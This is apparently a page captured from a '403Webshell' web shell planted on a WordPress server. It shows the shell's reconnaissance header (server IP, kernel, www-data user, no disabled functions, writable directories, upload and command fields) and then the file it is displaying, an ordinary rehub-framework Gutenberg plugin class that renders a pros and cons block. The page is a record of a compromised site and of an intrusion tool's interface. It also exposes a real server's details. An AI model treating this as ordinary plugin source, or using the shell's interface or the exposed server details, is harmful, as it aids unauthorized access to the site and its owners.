403Webshell
Server IP : 5.129.245.98  /  Your IP : 216.73.216.246
Web Server : Apache/2.4.66 (Debian)
System : Linux 1b8c17c336b9 6.8.0-111-generic #111-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 11 23:16:02 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/html/wp-content/plugins/rehub-framework/gutenberg/blocks/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/wp-content/plugins/rehub-framework/gutenberg/blocks/class-conspros.php
<?php

namespace Rehub\Gutenberg\Blocks;

defined( 'ABSPATH' ) OR exit;

class ConsPros extends Basic {
	protected $name = 'conspros';

	protected $attributes = array(
		'prosTitle' => array(
			'type'    => 'string',
			'default' => 'Positive',
		),
		'positives' => array(
			'type'    => 'object',
			'default' => array(
				array( 'title' => 'Positive' )
			),
		),
		'consTitle' => array(
			'type'    => 'string',
			'default' => 'Negatives',
		),
		'shadow_disable' => array(
			'type'    => 'boolean',
			'default' => false,
		),
		'negatives' => array(
			'type'    => 'object',
			'default' => array(
				array( 'title' => 'Negative' )
			),
		),
	);

	protected function list_content( $items ) {
		$html = '<ul>';

		foreach ( $items as $val ) {
			$html .= '<li>' . $val['title'] . '</li>';
		}

		$html .= '</ul>';

		return $html;
	}


	protected function render( $settings = array(), $inner_content = '' ) {
		$html           = '';
		$pros_content   = '';
		$cons_content   = '';
		$pros_title     = $settings['prosTitle'];
		$cons_title     = $settings['consTitle'];
		$positives      = $settings['positives'];
		$negatives      = $settings['negatives'];
		$column_classes = ( count( $positives ) === 0 || count( $negatives ) === 0 ) ? '' : 'wpsm-one-half';
		$shadow_disable = (!empty( $settings['shadow_disable'])) ? true : false;

		if ( ! empty( $positives ) ) {
			$pros_content .= '<div class="' . $column_classes . '">';
			$pros_content .= wpsm_pros_shortcode( array( 'title' => $pros_title ), $this->list_content( $positives ) );
			$pros_content .= '</div>';
		}

		if ( ! empty( $negatives ) ) {
			$cons_content .= '<div class="' . $column_classes . '">';
			$cons_content .= wpsm_cons_shortcode( array( 'title' => $cons_title ), $this->list_content( $negatives ) );
			$cons_content .= '</div>';
		}

		$wrapperclass = ($shadow_disable) ? 'flowhidden' : 'rate_bar_wrap';

		$html .= '<div class="'.$wrapperclass.'">' . $pros_content . $cons_content . '</div>';
		echo $html;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit